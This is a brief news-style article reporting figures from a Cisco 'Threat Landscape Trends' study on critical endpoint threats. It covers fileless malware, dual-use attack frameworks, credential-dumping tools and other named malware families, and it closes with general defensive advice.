According to a recent Cisco study title ‘Threat Landscape Trends,’ fileless threats have topped as the most common critical-severity cybersecurity threat to endpoints in the threat category list.
Endpoint security threats can be divided into three main categories on the basis of critical-severity Indicators-of-Compromise (IOCs):
The first segment is fileless malware, such as Kovter, Poweliks, Divergent, and LemonDuck, which comprises 30% of critical-severity threats. These are considered as the most destructive and require immediate attention.
Secondly, dual-use tools such as PowerShell Empire, CobaltStrike, Powersploit, and Metasploit have been most commonly used for both exploitation and post-exploitation tasks, which makes up for 24% of the critical threats.
The last one on the list is credential-dumping tools, most commonly the Mimikatz tool to scrape login credentials from a compromised computer, comprising 21% of critical threats.
The remaining 25% contains a mix of threats, such as ransomware (Maze, Ryuk, and BitPaymer); worms (Qakbot and Ramnit); RATs (Corebot and Glupteba); banking Trojans (Dridex, Dyre, Astaroth, and Azorult); and other downloaders, wipers, and rootkits.
The fileless threat method enables an attacker to maintain persistence and evade detection by abusing tools that are already in the system to initiate attacks. For Ex, We can mention Fritzfrog a botnet attack and Netwalker ransomware
To defend against fileless malware, users are advised to defend their endpoints by allowing limited execution of unknown files, monitoring processes for unusual changes, and the registry for strange process injection attempts, and by keeping an eye on connections between endpoints.